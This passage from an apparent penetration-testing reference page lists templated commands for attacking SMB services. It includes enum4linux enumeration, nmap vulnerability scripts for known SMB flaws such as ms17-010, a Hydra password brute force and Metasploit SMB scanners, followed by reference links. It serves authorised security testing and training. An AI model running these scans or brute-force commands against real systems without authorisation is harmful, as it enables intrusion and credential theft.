  Name: Enum4Linux
  Description: General SMB Scan
  Command: enum4linux -a {IP}

Entry_3:
  Name: Nmap SMB Scan 1
  Description: SMB Vuln Scan With Nmap
  Command: nmap -p 139,445 -vv -Pn --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse {IP}

Entry_4:
  Name: Nmap Smb Scan 2
  Description: SMB Vuln Scan With Nmap (Less Specific)
  Command: nmap --script 'smb-vuln*' -Pn -p 139,445 {IP}

Entry_5:
  Name: Hydra Brute Force
  Description: Need User
  Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb

Entry_6:
  Name: SMB/SMB2 139/445 consolesless mfs enumeration
  Description: SMB/SMB2 139/445 enumeration without the need to run msfconsole
  Note: sourced from https://github.com/carlospolop/legion
  Command: msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 445; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 445; run; exit'
```
## References

- NetExec (CME) wiki – Kerberos usage
- Pentesting Kerberos (88) – client setup and troubleshooting
- 0xdf – HTB: TheFrizz
{{#include ../../banners/hacktricks-training.md}}